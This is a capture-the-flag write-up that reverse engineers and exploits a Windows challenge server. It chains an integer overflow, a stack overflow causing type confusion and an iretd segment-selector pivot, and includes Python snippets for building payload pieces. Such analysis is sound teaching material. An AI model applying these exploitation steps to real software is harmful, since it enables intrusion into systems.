Last month, during Ekoparty, Blue Frost Security published a Windows challenge. Since Windows exploitation challenges are rare in CTFs, and since I found this one interesting and very clever, I’ve decided to write about my reverse engineering and exploitation methodology.

Challenge Requests

Only Python solutions without external libraries will be accepted
The goal is to execute the Windows Calculator (calc.exe)
The solution should work on Windows 10 or Windows 11
Process continuation is desirable (not mandatory)

You can download the target application here (backup).

High-Level Analysis

When exploring an unknown executable, one of the first things I check is which security mitigations were enabled when the binary was compiled. On Linux I’m used to checksec.sh; on Windows I use winchecksec or PESecurity. Neither is actively maintained, but they serve our purpose.

Running winchecksec reports the following mitigations:

C:\Users\VoidSec>winchecksec.exe bfs-eko2022.exe
Architecture : AMD64
Dynamic Base : "Present"
ASLR : "Present"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation : "Present"
NX/DEP : "Present"
SEH : N/A
CFG : "NotPresent"
RFG : "NotPresent"
SafeSEH : N/A
GS : "Present"
Authenticode : False
.NET : False

Some of these details can also be confirmed at runtime with a tool like System Informer (formerly Process Hacker):

This means that we are dealing with an un-obfuscated x64 binary written in C++ (checked with DIE), with ASLR, DEP and stack canaries enabled but no CFG.

Once executed, the binary binds to 0.0.0.0, port 31415, and waits for a client connection.

As per my methodology, I proceeded to reverse engineer the high-level functionality of each code block, renaming the blocks with meaningful labels. One thing that also helps me better visualize the code flow is colouring blocks:

Blue shades: nodes that I’m stepping through while debugging or paths followed by the software. For more complex software I generally trace the execution flow with tools like PIN, DynamoRIO and the Tenet plugin for IDA.
Green shades: blocks that I want to reach or that are holding main/interesting functionalities I’d like to explore.
Black/grey: error messages/irrelevant code sections.
Orange: possible logic vulnerabilities that I’d like to further examine.
Red: possible memory corruption vulnerabilities that I’d like to further examine.

I’ve then collapsed all irrelevant nodes, leaving me with the following simplified code graph:

Handshake

I usually combine debugging and static code analysis to get the most out of both, so I wrote a simple Python “client” to interact with the target.

As soon as the software starts, a buffer that is always static (both in size and memory address) is allocated in the heap:

As we can see from the VirtualAlloc() API call above, the buffer is allocated at address 0x10000000 and it is of size 0x1000 (4096 bytes); the memory protection for the region is RWX.

After that come the socket initialization and the server binding; the program then enters a loop, waiting for a client connection.
Note: the server is not multithreaded and only one client at a time is allowed.

Data sent to the server is stored in the previously allocated heap-buffer and then a function is called. This function, which I renamed handhshake_check(), has the prototype handhshake_check(uint buffer_length, *buffer) and decompiles to the following code:

_BOOL8 __fastcall handhshake_check(__int64 buffer_length, const char *buffer)
{
    return strncmp(buffer, Str2, 6ui64) == 0;
}

This function verifies whether the first 6 bytes of our buffer match the string “Hello“ (five characters plus the terminating null byte); if they do, the execution continues and the software sends back “Hi“.
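The handshake can be exercised with a few lines of standard-library Python. This is a minimal sketch, not the client used for this write-up: the helper name handshake() is hypothetical, and it assumes the server’s reply starts with the bytes “Hi”.

```python
import socket

# strncmp() compares 6 bytes, so the terminating NUL must be sent as well.
HANDSHAKE = b"Hello\x00"


def handshake(sock: socket.socket) -> bool:
    """Send the greeting and report whether the reply starts with b"Hi"."""
    sock.sendall(HANDSHAKE)
    reply = sock.recv(16)
    return reply.startswith(b"Hi")


# Usage against a locally running target (port taken from the analysis above):
#   with socket.create_connection(("127.0.0.1", 31415), timeout=5) as s:
#       print("handshake ok:", handshake(s))
```

Keeping the socket as a parameter makes the helper easy to try against a stub before pointing it at the real binary.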

Data Processing

After that, the execution flow is transferred to another function, which I’ve renamed as data_processing() and decompiled as follows:

int __fastcall data_processing(SOCKET socket)
{
    int result; // eax
    int v2; // eax
    unsigned int i; // [rsp+20h] [rbp-F48h]
    unsigned int header_len; // [rsp+24h] [rbp-F44h]
    unsigned int len_0; // [rsp+24h] [rbp-F44h]
    CHAR CmdLine[3840]; // [rsp+30h] [rbp-F38h] BYREF
    char packet_type; // [rsp+F30h] [rbp-38h]
    char stack_buff[8]; // [rsp+F40h] [rbp-28h] BYREF
    char packet_type_0; // [rsp+F48h] [rbp-20h]
    unsigned __int16 packet_data_length; // [rsp+F49h] [rbp-1Fh]

    for ( i = 0; i < 0x1000; i += 16 )
    {
        *(_QWORD *)&heap_buff[i] = 0x5050505050505050i64;
        *(_QWORD *)&heap_buff[i + 8] = 0xCF58585858585858ui64;
    }
    printf(" [+] Processing request\n");
    header_len = recv(socket, stack_buff, 11, 0);
    if ( header_len == -1 )
        return printf(" [-] Client data error\n");
    if ( header_len < 11ui64 )
        return printf(" [-] Bad size\n");
    if ( *(_QWORD *)stack_buff != '2202okE' )
        return printf(" [-] Wrong cookie value\n");
    packet_type = packet_type_0;
    if ( packet_type_0 != 'T' )
        return printf(" [-] Invalid packet type\n");
    if ( (__int16)packet_data_length > 3840 ) // Integer Overflow
        return printf(" [-] Invalid packet size\n");
    len_0 = recv(socket, heap_buff, packet_data_length, 0); // writing packet_data to heap-buffer
    printf(" [+] Data received: %i bytes\n", len_0);
    char_replace(CmdLine, heap_buff, len_0);
    if ( packet_type == 'T' )
    {
        printf(" [+] Message received: %s\n", CmdLine);
        send(socket, CmdLine, len_0, 0);
    }
    else
    {
        printf(" [-] Unsupported message\n");
        v2 = strlen(Str);
        send(socket, buf, v2 + 1, 0);
    }
    result = packet_type;
    if ( packet_type == 'X' )
    {
        off_7FF720E1C000 = (__int64 (__fastcall *)(_QWORD))&heap_buff[len_0];
        return off_7FF720E1C000(CmdLine);
    }
    return result;
}

In this function:

The previously allocated heap-buffer is filled with 0x5050505050505050 and 0xCF58585858585858.
Note: this is unusual, as memory is usually initialized to 0.
Another packet is expected; this time the content is saved in a stack buffer.
If the received packet is at least 11 bytes long, the function checks whether it starts with a specific “cookie value”, 0x323230326F6B45 (“Eko2022“).
Then the first byte after the “cookie value” is checked for the T character. This field determines the packet’s type.
Then the 2 bytes after the packet’s type are treated as the size of the packet’s data, which must not exceed 0xF00 (3840 bytes).

I’ve named this structure: packet_header

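#pragma pack(push, 1)          // the 11-byte header has no padding
struct packet_header {
    ULONGLONG cookie_value;    // 8 bytes, compared as a QWORD: "Eko2022" plus a null byte
    BYTE      packet_type;     // 'T'
    SHORT     packet_data_len; // compared as a signed 16-bit value
};
#pragma pack(pop)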

After our packet’s header passes all the above validations, the server waits for the packet’s data. This packet (packet_data) is saved in the previously allocated heap-buffer.
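The 11-byte header described above can be packed with Python’s struct module. This is a sketch under the layout recovered from the decompiled code (8-byte cookie, 1-byte type, 2-byte little-endian length); the names COOKIE, HEADER_FORMAT and build_header() are mine, not the author’s.

```python
import struct

COOKIE = b"Eko2022\x00"  # 8 bytes, compared by the server as a single QWORD
HEADER_FORMAT = "<8scH"  # little-endian, unpadded: 8 + 1 + 2 = 11 bytes


def build_header(packet_type: bytes, data_len: int) -> bytes:
    """Pack the cookie, the one-byte packet type and the 16-bit data length."""
    return struct.pack(HEADER_FORMAT, COOKIE, packet_type, data_len)


# A well-formed header announcing 0x100 bytes of packet data.
header = build_header(b"T", 0x100)
```

The `<` prefix matters: it disables native alignment, so the length field lands at offset 9 as the server expects.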

char_replace()

Then a function I renamed char_replace() is called; it copies the content of packet_data (stored in the heap) to a stack buffer (CmdLine) of size 0xF00 (3840 bytes). While copying the data, it replaces all occurrences of the bytes 0x2B and 0x33 with null bytes.

__int64 __fastcall char_replace(_BYTE *CmdLine, _BYTE *heap_buffer, unsigned int size)
{
    __int64 result; // rax
    unsigned int i; // [rsp+0h] [rbp-18h]

    for ( i = 0; ; ++i )
    {
        result = size;
        if ( i >= size )
            break;
        if ( *heap_buffer == 0x2B || *heap_buffer == 0x33 )
            *CmdLine = 0;
        else
            *CmdLine = *heap_buffer;
        ++heap_buffer;
        ++CmdLine;
    }
    return result;
}

After the copy and character replacement, the resulting data is sent back to the client.
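When preparing a payload it helps to model this filter locally. The following is a small Python re-implementation of the byte replacement, plus a hypothetical helper (find_bad_bytes(), my own name) that reports where a payload would be altered in the stack copy.

```python
# Bytes that char_replace() turns into NUL while copying to the stack.
BAD_BYTES = frozenset({0x2B, 0x33})


def char_replace(data: bytes) -> bytes:
    """Return the stack copy the server would produce for `data`."""
    return bytes(0 if b in BAD_BYTES else b for b in data)


def find_bad_bytes(data: bytes) -> list:
    """Return the offsets in `data` that the filter would overwrite."""
    return [i for i, b in enumerate(data) if b in BAD_BYTES]
```

Note that only the stack copy is modified; the bytes in the heap-buffer stay as they were sent.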

Chaining Vulnerabilities

Integer Overflow

The packet_data_len comparison (which IDA’s decompiler fails to visualize adequately) is odd enough to investigate. As we can see from the raw assembly:

movsx   eax, packet_data_length
cmp     eax, 0F00h
jle     short loc_7FF609B81386

The packet_data_len value is loaded into the EAX register by the MOVSX instruction.

MOVSX: copies the contents of the source operand to the destination operand and sign-extends the value. In 64-bit mode, the instruction’s default operation size is 32 bits.

JLE: a conditional jump that follows a test. After a cmp, it jumps if the destination operand is less than or equal to the source operand, using a signed comparison.

If we send a packet_data_len of value 0xFFFF, it will be sign-extended to 0xFFFFFFFF, which the following signed comparison treats as -1, and the length check is “bypassed”.
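The effect of the MOVSX/JLE pair can be reproduced in Python to see which 16-bit values slip through. This is only a model of the three instructions above; movsx16() and passes_length_check() are illustrative names.

```python
MAX_LEN = 0xF00  # the constant used by `cmp eax, 0F00h`


def movsx16(value: int) -> int:
    """Interpret the low 16 bits of `value` as a signed integer (MOVSX)."""
    value &= 0xFFFF
    return value - 0x10000 if value & 0x8000 else value


def passes_length_check(raw_len: int) -> bool:
    """True when the signed comparison (JLE) lets the packet through."""
    return movsx16(raw_len) <= MAX_LEN
```

Every value from 0x8000 to 0xFFFF is seen as negative and therefore accepted, while 0x0F01 to 0x7FFF is rejected as intended.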

Stack-based Buffer Overflow

The preceding “Integer Overflow” leads directly to a stack-based buffer overflow: char_replace() copies the content of the heap-buffer (at address 0x10000000) into the CmdLine[3840] buffer using len_0, the number of bytes actually received, which is no longer capped at 3840 once packet_header.packet_data_len passes the check with a large value.

Before trashing the stack with our linear overflow, it is always better to check what interesting data sits on it. Inspecting the stack after the CmdLine[3840] buffer with a debugger reveals a couple of things:

Green: the content of the CmdLine buffer (filled with A’s up to its limit, so as not to trigger the stack-based buffer overflow yet).
Blue: the content of the packet_type local variable.
Orange: the content of the packet_header buffer we’ve previously sent to the server.
Violet: the stack canary/cookie. Remember, the binary was compiled with the /GS flag, and before data_processing()’s epilogue we can see a call to the __security_check_cookie() function.
Red: the saved return address into the main() function.

Mitigations

Simply overwriting the saved return pointer is not a viable option, as we’d also end up overwriting the stack canary, causing the OS to kill the entire process.

Unfortunately, we do not have an information leak either: the send() call that echoes back the content of the CmdLine buffer does not use the length value we control in the packet’s header but the actual size of the packet_data we’ve sent.

We need to come up with something different.

Type Confusion

As mentioned before, one of the interesting pieces of data left on the stack, and sitting below our buffer, is the content of the packet_type local variable. This value is later used for the type-check comparisons:

if ( packet_type == 'T' )
{
    printf(" [+] Message received: %s\n", CmdLine);
    send(socket, CmdLine, len_0, 0);
}
else
{
    [--TRUNCATED--]
}
result = packet_type;
if ( packet_type == 'X' )
{
    [--TRUNCATED--]
}
return result;

As we can overwrite its value (using the linear stack-based buffer overflow previously discovered), we can cause a “type confusion” and end up in the X case.
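The distance to packet_type follows from the stack offsets in the decompiled listing (CmdLine at [rsp+30h], packet_type at [rsp+F30h]). Below is a sketch of a payload that reaches exactly that byte; build_type_confusion() is a hypothetical helper, the filler byte is arbitrary, and the header sent beforehand must declare a length that passes the signed check (for example 0xFFFF).

```python
CMDLINE_OFFSET = 0x30       # CHAR CmdLine[3840] at [rsp+30h]
PACKET_TYPE_OFFSET = 0xF30  # char packet_type   at [rsp+F30h]
DISTANCE = PACKET_TYPE_OFFSET - CMDLINE_OFFSET  # 0xF00 bytes


def build_type_confusion(body: bytes = b"", filler: bytes = b"A") -> bytes:
    """Pad `body` up to packet_type and overwrite that byte with 'X'."""
    if len(body) > DISTANCE:
        raise ValueError("body does not fit before packet_type")
    return body.ljust(DISTANCE, filler) + b"X"
```

A payload of 0xF01 bytes stops well short of the stack canary, so __security_check_cookie() is never given a reason to complain.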

Code Execution

If we successfully trigger the type confusion, the program will directly jump into the heap-buffer containing our packet_data and the data written during the heap-buffer “initialization” (0x5050505050505050 and 0xCF58585858585858).

These initialization bytes are not random; they disassemble to:

push rax    ; 0x50
pop rax     ; 0x58
iretd       ; 0xCF

Each 16-byte block therefore holds eight push rax, seven pop rax and a final iretd.

Without any further modification, the software crashes with an Access Violation error on the iretd instruction.
Note: the execution flow always jumps into the heap-buffer right after the bytes we control (&heap_buff[len_0]). Because of that, we can neither “bypass” nor overwrite the iretd instruction.
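Because the entry point depends on how many bytes we send, it is worth modelling what runs before the first iretd. The sketch below rebuilds one 16-byte block from the two constants in the initialization loop and walks it from a given entry offset; sled_from() and rsp_delta() are illustrative helpers, and the model assumes the bytes at the entry point are still the untouched initialization pattern.

```python
import struct

OPCODES = {0x50: "push rax", 0x58: "pop rax", 0xCF: "iretd"}

# One 16-byte block exactly as the initialization loop writes it.
BLOCK = struct.pack("<QQ", 0x5050505050505050, 0xCF58585858585858)


def sled_from(entry: int) -> list:
    """Mnemonics executed from offset `entry` up to and including iretd."""
    executed = []
    offset = entry
    while True:
        opcode = BLOCK[offset % 16]
        executed.append(OPCODES[opcode])
        if opcode == 0xCF:
            return executed
        offset += 1


def rsp_delta(entry: int) -> int:
    """Net change of RSP, in bytes, by the time iretd executes."""
    ops = sled_from(entry)
    return 8 * (ops.count("pop rax") - ops.count("push rax"))
```

For example, entering at an offset that is 8 modulo 16 executes seven pops and no pushes, moving RSP up by 56 bytes before iretd reads its frame.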

If we really want to crack this challenge we should dive into the iretd instruction.

iretd

Looking at the x86 Instruction Set Reference:

IRETD – interrupt return double (32-bit operand size):

Returns program control from an exception or interrupt handler to a program that was interrupted by an exception, an external interrupt, or a software-generated interrupt. In Real-Address Mode, the IRET instruction performs a far return to the interrupted program. During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.

Since we control the stack, we’re only left with the task of crafting it in a way that would allow us to gain code execution.

In 64-bit mode, IRETD pops five 32-bit values from the stack, in this order:

EIP
CS
EFLAGS
ESP
SS

We can easily point EIP and ESP into the heap-buffer we control, while I’ve taken the EFLAGS value from WinDbg.

EIP: 0x10000014, the start of our heap-buffer plus an offset; used to land directly at the beginning of our shellcode.
ESP: 0x10000800, a “safe” place in the “middle” of our heap-buffer. Not at the beginning, as the shellcode sits there, and not at the end, so that stack usage cannot stray outside the boundaries of the heap-buffer region and trigger access violation errors.
EFLAGS: 0x246
SS and CS, on the other hand, were more difficult…

Global Descriptor Table

SS and CS are used to index the Global Descriptor Table (GDT) which has descriptors for:

0x00: Null descriptor
0x10: Kernel code segment
0x18: Kernel data segment
0x20: User code segment
0x28: User data segment

We can explore them in a kernel-mode debugger, such as WinDbg, with the following command:

0: kd> !process 0 0 bfs-eko2022.exe
PROCESS ffffe303936d7080
    SessionId: 1 Cid: 0b38 Peb: 00dd2000 ParentCid: 0e90
    DirBase: 119c67002 ObjectTable: ffffb48eed28d5c0 HandleCount: 52.
    Image: bfs-eko2022.exe

0: kd> .process /r /P ffffe303936d7080
Implicit process is now ffffe303`936d7080
.cache forcedecodeptes done
Loading User Symbols
........

0: kd> dd @gdtr
fffff804`1645afb0 00000000 00000000 00000000 00000000
fffff804`1645afc0 00000000 00209b00 00000000 00409300
fffff804`1645afd0 0000ffff 00cffb00 0000ffff 00cff300
fffff804`1645afe0 00000000 0020fb00 00000000 00000000
fffff804`1645aff0 90000067 16008b45 fffff804 00000000
fffff804`1645b000 00003c00 0040f300 00000000 00000000
fffff804`1645b010 00000000 00000000 00000000 00000000
fffff804`1645b020 00000000 00000000 00000000 00000000

The entries below 0x20 are “reserved” for the kernel. For user mode, we want to use selectors 0x20 and 0x28.

However, it’s not quite that straightforward. Because each descriptor is 8 bytes in size, the three least significant bits of a descriptor’s offset are always zero. Intel uses the two lowest bits of a selector to represent the Requested Privilege Level (RPL). These are zero when operating in ring-0 (kernel), but as we want to move to ring-3 (user mode) we must set them to “3”.

This means that our code segment selector will be (0x20 | 0x3 = 0x23), and our data segment selector will be (0x28 | 0x3 = 0x2B).

Now, while the code selector poses no problem, the data selector is one of the “bad bytes” replaced by the char_replace() function.
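The selector arithmetic is easy to check in Python. The helpers below (make_selector() and split_selector(), names of my own choosing) combine a GDT offset with the table-indicator bit and the RPL, and the bad-byte set is the one filtered by char_replace().

```python
BAD_BYTES = {0x2B, 0x33}  # bytes zeroed by char_replace() on the stack copy


def make_selector(gdt_offset: int, rpl: int, ti: int = 0) -> int:
    """Build a segment selector: descriptor offset | TI << 2 | RPL."""
    if gdt_offset & 0x7:
        raise ValueError("descriptor offsets are multiples of 8")
    if not 0 <= rpl <= 3 or ti not in (0, 1):
        raise ValueError("RPL must be 0..3 and TI must be 0 or 1")
    return gdt_offset | (ti << 2) | rpl


def split_selector(selector: int) -> tuple:
    """Return (descriptor offset, TI, RPL) for a selector value."""
    return selector & ~0x7, (selector >> 2) & 1, selector & 0x3


code_selector = make_selector(0x20, 3)  # 0x23
data_selector = make_selector(0x28, 3)  # 0x2B, a filtered byte
```

Running candidate selectors through the bad-byte set before placing them in the payload catches this kind of collision early.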

For the stack selector, we just need to find a descriptor whose type is Data, RW. I’ve looped through all the selectors and ended up with the value 0x53:

0: kd> dg 0x53
                                                    P Si Gr Pr Lo
Sel        Base              Limit          Type    l ze an es ng Flags
---- ----------------- ----------------- ---------- - -- -- -- -- --------
0053 00000000`00000000 00000000`00003c00 Data RW Ac 3 Bg By P  Nl 000004f3

CS: 0x23 code segment selector
SS: 0x53 stack segment selector
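With all five values chosen, the frame that IRETD consumes can be packed as five little-endian DWORDs in the architectural pop order (EIP, CS, EFLAGS, ESP, SS). This is a sketch: build_iretd_frame() is a hypothetical helper, and where the frame has to sit in the payload so that RSP points at it when iretd executes is not covered here. The frame is read from the stack copy, so it is checked against the filtered bytes.

```python
import struct

BAD_BYTES = {0x2B, 0x33}  # zeroed by char_replace() in the stack copy


def build_iretd_frame(eip: int, cs: int, eflags: int, esp: int, ss: int) -> bytes:
    """Pack the five DWORDs popped by IRETD, rejecting filtered bytes."""
    frame = struct.pack("<5I", eip, cs, eflags, esp, ss)
    bad = [hex(b) for b in frame if b in BAD_BYTES]
    if bad:
        raise ValueError("frame contains filtered bytes: " + ", ".join(bad))
    return frame


# Values from the analysis above.
frame = build_iretd_frame(0x10000014, 0x23, 0x246, 0x10000800, 0x53)
```

The packed frame is 0x14 bytes long, which is consistent with an EIP of 0x10000014 if the frame occupies the very start of the data we send; that placement is my inference, not something stated above.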

Using the above settings will pivot the code execution flow up to the beginning of our shellcode but in 32-bit mode. Unfortunately, since the stack base and limit are completely messed up, as soon as we try to use the stack (e.g., PUSH EAX) the program will crash.

To properly execute our shellcode, I’ve introduced the following “prologue” at the beginning of our shellcode:

JMP 0x33:0x1000001c

This “prologue” jumps a few bytes further into our shellcode and has the nice property of letting us specify 0x33 as the new code segment, bringing us back into 64-bit mode.
Note: if you’re wondering why I’m allowed to use the 0x33 value, it is a “bad byte” only in the stack copy; we’re now executing from the heap, where it remains untouched.
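For a Python-only exploit the far jump has to be emitted as raw bytes. In 32-bit code, JMP ptr16:32 is encoded as opcode 0xEA followed by the 32-bit offset and then the 16-bit selector; the helper below (far_jmp_ptr16_32(), my own name) is a hand-assembled sketch of that encoding, not an excerpt from the published exploit.

```python
import struct


def far_jmp_ptr16_32(selector: int, offset: int) -> bytes:
    """Encode `JMP selector:offset` for 32-bit code (EA, offset32, selector16)."""
    return struct.pack("<BIH", 0xEA, offset, selector)


# JMP 0x33:0x1000001c, switching back to the 64-bit code segment.
prologue = far_jmp_ptr16_32(0x33, 0x1000001C)
```

The instruction is 7 bytes long, so if it starts at 0x10000014 it ends at 0x1000001A, leaving one filler byte at 0x1000001B before the jump target.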

Since 64-bit mode doesn’t need a valid stack segment selector (it’s not used), we can finally restore the stack pointer to a meaningful value. Luckily enough, the RCX register still holds a reference to the original stack, from before it was “polluted” by the IRETD instruction. We can just transfer it back into RSP with:

mov rsp,rcx

With everything restored we can execute the shellcode and finally pop calc!

Video PoC and Exploit

The complete (and commented) exploit code, IDA’s DB and target binary are available on my GitHub.
